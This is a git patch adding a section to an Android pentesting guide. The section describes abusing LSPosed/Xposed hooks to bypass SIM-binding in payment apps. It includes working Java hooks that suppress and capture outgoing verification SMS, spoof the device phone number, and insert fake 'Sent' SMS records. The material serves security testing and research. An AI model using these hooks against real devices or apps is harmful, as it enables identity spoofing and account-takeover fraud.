From 39e0d0dd0cc992c00a44cb30afafa84f5d6b5e36 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Thu, 19 Mar 2026 13:06:19 +0000 Subject: [PATCH] Add content from: Weaponizing LSPosed: Remote SMS Injection and Identity Spoof... --- ...-instrumentation-and-ssl-pinning-bypass.md | 65 ++++++++++++++++++- 1 file changed, 64 insertions(+), 1 deletion(-) diff --git a/src/mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.md b/src/mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.md index 16214ecfe2d..d0afb21eb37 100644 --- a/src/mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.md +++ b/src/mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.md @@ -334,6 +334,69 @@ apk-mitm app.apk install-burp-certificate.md {{#endref}} + +## LSPosed/Xposed Hooking Abuse (Telephony/SMS) + +On rooted devices, LSPosed/Xposed modules can hook Java telephony/SMS APIs at runtime, keeping the APK unmodified on disk while fully controlling what the app sees. This is commonly abused to bypass SIM‑binding flows that trust local telephony APIs or local SMS provider state. + +Key primitives +- **Suppress outgoing verification SMS** while exfiltrating the token by short‑circuiting `SmsManager.sendTextMessage` in `beforeHookedMethod`. +- **Spoof MSISDN/line number** by forcing `TelephonyManager.getLine1Number()` and `SubscriptionInfo.getNumber()` to return an attacker‑controlled value. +- **Plant a fake “Sent” record** in the SMS provider so apps that check local SMS history see a successful send even if the carrier never received it. + +Example: block SMS dispatch and capture content +```java +XposedHelpers.findAndHookMethod( + "android.telephony.SmsManager", + lpparam.classLoader, + "sendTextMessage", + String.class, String.class, String.class, PendingIntent.class, PendingIntent.class, + new XC_MethodHook() { + protected void beforeHookedMethod(MethodHookParam param) { + String body = (String) param.args[2]; + // exfiltrate body to operator channel + param.setResult(null); // suppress real SMS send + } + } +); +``` + +Example: spoof device phone number +```java +XposedHelpers.findAndHookMethod( + "android.telephony.TelephonyManager", + lpparam.classLoader, + "getLine1Number", + new XC_MethodHook() { + protected void afterHookedMethod(MethodHookParam param) { + param.setResult(spoofedMsisdn); + } + } +); +``` +```java +XposedHelpers.findAndHookMethod( + "android.telephony.SubscriptionInfo", + lpparam.classLoader, + "getNumber", + new XC_MethodHook() { + protected void afterHookedMethod(MethodHookParam param) { + param.setResult(spoofedMsisdn); + } + } +); +``` + +Example: inject a fake “Sent” SMS record +```java +ContentValues v = new ContentValues(); +v.put("address", dest); +v.put("body", body); +v.put("type", 2); // sent +v.put("status", 0); // success +context.getContentResolver().insert(Uri.parse("content://sms/sent"), v); +``` + ## Handy command cheat‑sheet ```bash @@ -396,5 +459,5 @@ Notes - [phantom-frida (stealth Frida server builder)](https://github.com/TheQmaks/phantom-frida) - [Frida OkHttp4 SSL pinning bypass script](https://github.com/Zero3141/Frida-OkHttp-Bypass) - [XDA guide to strong Play Integrity bypass (2025)](https://xdaforums.com/t/updated-11-17-2025-guide-get-strong-integrity-fix-banking-apps-revolut-google-wallet-android-16-working.4753805/) - +- [Weaponizing LSPosed: Remote SMS Injection and Identity Spoofing in Modern Payment Ecosystems](https://www.cloudsek.com/blog/weaponizing-lsposed-remote-sms-injection-and-identity-spoofing-in-modern-payment-ecosystems-2) {{#include ../../banners/hacktricks-training.md}}